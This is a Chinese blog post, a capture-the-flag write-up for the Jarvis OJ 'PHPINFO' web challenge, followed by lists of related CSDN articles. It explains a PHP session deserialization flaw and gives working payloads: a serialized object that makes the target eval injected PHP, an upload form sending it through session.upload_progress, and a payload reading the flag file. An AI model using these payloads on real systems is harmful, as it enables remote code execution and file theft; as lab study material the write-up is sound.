Jarvis OJ PHPINFO

最新推荐文章于 2021-09-10 10:28:45 发布
最新推荐文章于 2021-09-10 10:28:45 发布
阅读量354 收藏
点赞数
分类专栏: Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/99324972
版权

1.知识点

1.1php处理器

PHP内置了三个处理器,用来对session进行序列化和反序列化。在php 5.5.4以前默认选择的是php,5.5.4之后就是php_serialize,这里面是php_serialize。

php处理器:

PHP
php_binary
php_serialize (php>=5.5.4)

1.2反序列化漏洞

这个配置可以在php.ini文件中的“session.serialize_handler”参数,找到。
在这里插入图片描述
当php.ini文件中的“session.serialize_handler”设置,与在页面中的“session.serialize_handler”设置不一样时,就会可能有反序列化漏洞。我们要做的,就是向session中添加数据,这个数据,是我们想要执行的命令。把命令放在类的属性:mdzz中,让后序列化,想办法放在session中。当执行“session_start();”这个函数时,会把session给反序列化,默认执行构造函数和析构函数,而析构函数中,又存在高危函数,“eval(this->mdzz)”,从而来执行我们传入的命令。那我们怎么在session中插入数据呢?

1.3 session.upload_progress.enabled

这也是一个php设置的一个参数,在这道题的phpinfo页面,我们可以看到它的这个参数为On。而当它为On时,如果我们向服务器POST一个参数和一个文件,就可以向session中添加一条数据,是不是很神奇。但是,是有条件的:参数的名字必须和这个参数”session.upload_progress.name“的值相同,有点绕,理解一下。”session.upload_progress.name“又是啥,你可以在php.ini文件中找到,默认都是“PHP_SESSION_UPLOAD_PROGRESS”。
在这里插入图片描述没错,还是很好满足的。当满足这个条件时,我们传过去的文件名,就可以被加到session中,我也不知道为什么。别人说的。然后,我们就开始吧!

2.实战

2.1 创建payload
<?php
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz = "print_r(scandir(dirname(__FILE__)));";
}
echo(serialize(new OowoO()));
?>

注意:这里的“OowoO”和"$mdzz",不能随便改。因为我们需要让我们这个对象在反序列化的时候,执行题目里“OowoO”这个类的构造和析构函数。最后生成payload:

 O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}

但是要在双引号前加上反斜杠,防止转义错误;还要在O前面加上“|”,最后讲为什么。

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}
2.2 利用payload

就像我们在1.3里讲的,发送一个文件,和一个参数:

<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
    <form action = "http://web.jarvisoj.com:32784/index.php" method = "POST" enctype = "multipart/form-data">
        <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123">
        <input type="file" name="file">
        <input type="submit">
    </form>
</body>
</html>

然后发送数据,抓包,把文件名改成我们改成生成的payload:
在这里插入图片描述

2.3 拿Flag

流程其实就是这样,接下来要做的,就是把“_FILE_”改成:"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php",让后再走一遍,就可以了。

|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}

在这里插入图片描述

沐目_01
关注
专栏目录
PHPINFO(jarvisoj)
Mikasa
04-19 845
今天做题的时候做了这一道。。刷新了对反序列化的认识。。 这道题考察了关于session序列化选择器的漏洞。。 参考文章:https://www.jb51.net/article/107101.htm 首先先介绍一下,关于session反序列化的三种机制: 首先在php.ini中关于session的设置: session.save_path="" #设置session的储存路径 sess...
jarvisoj WEB +MISC writeup
Ni9htMar3的博客
12-26 7284
WEB PORT 51 Login LOCALHOST 神盾局的秘密 IN a mess Easy Gallery Simple Injection 方法一 方法二 api的调用 PHPINFO
Jarvis OJ WEB PHPINFO
A_dmin的博客
04-13 468
Jarvis OJ WEB PHPINFO session反序列化的题目,很少做,貌似也不会,这里记一下 打开题目可以得到源码: <?php //A webshell is wait for you ini_set('session.serialize_handler', 'php'); session_start(); class OowoO { public $mdzz; ...
jarvisoj web-phpinfo
weixin_46578840的博客
09-10 136
打开题目地址得到源码 这题的突破点就是 ini_set(‘session.serialize_handler’, ‘php’); 查了下手册: php大于5.5.4的版本中默认使用php_serialize规则 通过phpinfo页面,我们知道php.ini中默认session.serialize_handler为php_serialize,而index.php中将其设置为php。这就导致了seesion的反序列化问题。 再看到 当一个上传在处理中,同时POST一个与INI中设置的session.upl
Jarvis OJ PHPINFO【审计代码反序列化】
Sp4rkW的博客
11-02 3978
原题地址:http://web.jarvisoj.com:32784/ 其实这题一开始是没有任何思路的,感觉不存在任何数据传输接收点,后来看到了一篇wp,点这里 感觉瞬间打开了新世界,,,这里写篇write up记录下做题过程 首先打开题目页面直接获得源码: &lt;?php //A webshell is wait for you ini_set('session.s...
jarvisoj Inject & PHPINFO
river
03-26 507
Jarvisoj Inject 扫描后台得到index.php~ <?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $table = Filter($table); mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker(); $sq...
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
-------已搬运------session.upload_progress。伪造session 反序列化 + 文件包含,,临时文件包含 ++ PHP7 的 segment fault
Zero_Adam的博客
05-01 717
目录:1. 在session反序列化,PHP解析器的考点中使用。2. 进行文件包含:!!!我发现了一个新的方法: 1. 在session反序列化,PHP解析器的考点中使用。 PHP反序列化之SEESSION反序列化(二):切入学习点:jarvis OJ PHPINFO. 这个是利用了当session.upload_progress.enabled开启时如果我们上传了一个和session.upload_progress.name同名的变量,也就是名字为PHP_SESSION_UPLOAD_PROGRESS的时
web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)
CJB6988125的博客
11-19 1万+
web做题笔记 buuoj easy_tornado tornado是一个python写的web服务器 读取文件hint.txt:md5(cookie_secret+md5(filename)) 我们只要找到cookie_secret 就能读取任意文件 直接搜cve:找到一个\r\n分割请求的。。好像搞不到cookie_secret 找到error?msg=Error模板注入??? {{1.}}出...
2021-7-21 Jarvis OJ-PHPINFO 知识点:session反序列化 PHP
m0_51326092的博客
07-21 379
文章目录前言题目和参考链接:重要知识点:解题过程总结 前言 本次做题历程可以说十分有趣,先是在BUU上自己做着easy_serialize_php,看完源代码以为是跟session有关的反序列化(后面自己查了wp发现不是×-×),所以自己就去百度关于session反序列化的知识点,看着看着就去做到了这到例题☺可谓是一波三折啊 提示:以下是本篇文章正文内容,本文借鉴了多位大佬的wp,仅供参考 题目和参考链接: 题目:http://web.jarvisoj.com:32784/ 相关知识点大佬讲解链接:
jarvisoj-web-wp
Iambangbang的博客
08-21 3571
Port51 这是一道pctf的原题,,显然要用公网ip端口进行访问,这时候用到了curl命令,使用curl –local-port http://web.jarvisoj.com:32770/就可以得到flag,但是貌似服务器出了点儿问题,所以不弹flag了 LOCALHOST ,这个题目和上面一道题目差不多,都很基础,用火狐的代理,直接就可以了, Login ,一开始进去没什么思
JARVISOJ RE
皮三宝好菜的博客
01-01 551
JARVISOJ RE 今天来吧三道恶心的re写一下。。。 难度从自我感觉的简单到坑排序 爬楼梯 这题其实最“简单”hiahiahia 经过多次实验,其实只要手速过快,轻轻松松啊。 //电脑xps15触屏,更加轻松了23333 =.= evil exe 文件加壳了,直接脱壳,完事后拖入ida 从里面的许多256可以联想到rc4,具体加密过程也不复杂。 这边直接给代码了。 #include &...
CTF中怎么看phpinfo
weixin_33828101的博客
05-04 1085
CTF中怎么看phpinfo 在比赛中经常遇到phpinfo,这个页面可以看到很多配置信息,我们需要在这么多信息中,着重看一下几个内容:1、allow_url_fopen和allow_url_include其中配置作用是这样的: allow_url_fopen=On(允许打开URL文件,预设启用) allow_url_fopen=Off(禁止打开URL文件) allow_ur...
Jarvisoj 逆向总结
Assassin
10-13 3855
因为本人是菜鸟,所以由简单但难的做了 [61dctf]androideasy 没什么可说的,直接反汇编打求一下密码 #_*_coding:utf-8_*_ a=[113, 123, 118, 112, 108, 94, 99, 72, 38, 68, 72, 87, 89, 72, 36, 118, 100, 78, 72, 87, 121, 83, 101, 39, 62, 94,...
phpinfo详解
weixin_30725467的博客
03-02 1299
php的很多信息都可以从phpinfo中获取,下面就详细了解下phpinfo的输出内容 1 php版本信息 第一行显示当前php版本 PHP Version 5.5.12 2 php.ini文件的位置 Configuration File (php.ini) Path C:\WINDOWS Loaded Configuration File D:\wamp\bin\ap...
jarvisoj刷题之旅】逆向题目爬楼梯的writeup
iqiqiya的博客
09-11 1309
先放到模拟器中运行一波 难道是得一直点吗  作为懒人的我可不答应 于是APKIDE反编译  用jd_jui直接看java源码 由java代码可知  我们只要直接让“爬到了,看FLAG“这个按钮可点击即可   那么让他可被点击   只需要改这里就好 分析可知  后面的传值   是与v5相关的   那么只要将他赋值1即可   改过之后   发现APKIDE与Androi...
原理+实践学习(PHP反序列化和Session反序列化)
Lemon's blog
05-04 3086
前言:PHP反序列化也是web安全中常见的一种漏洞,这次就先来大致了解一下PHP反序列化漏洞。 一、PHP序列化和反序列化 在学习PHP反序列化漏洞时,先来了解一下基础的知识。 (一)PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的...
Jarvis OJ WEB
沐目的博客
10-15 385
Jarvis OJ WEB 这道题,和web知识好像没有什么关系,但学到了一些技巧。 1.通过JavaScript也可以提交表单 2.python正香,竟然还能算矩阵 打开题目,打开源码,发现没有form标签,所以应该是用JavaScript提交的。于是找像样的JavaScript,就是他了:app.js。 打开后,去网上找js格式化,然后题目让我们输出password,那么我们就找passwrd...
JarvisOJ:实战渗透挑战与信息获取技术
"JarvisOJ 是一个综合性的在线编程竞赛平台,提供了多种挑战环节以测试参赛者的技能。本文将介绍几个关键知识点: 1. JarvisOJ-WEB 部分:该部分强调了平台的安全性,特别是对访问控制的设置。题目要求使用特定端口...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值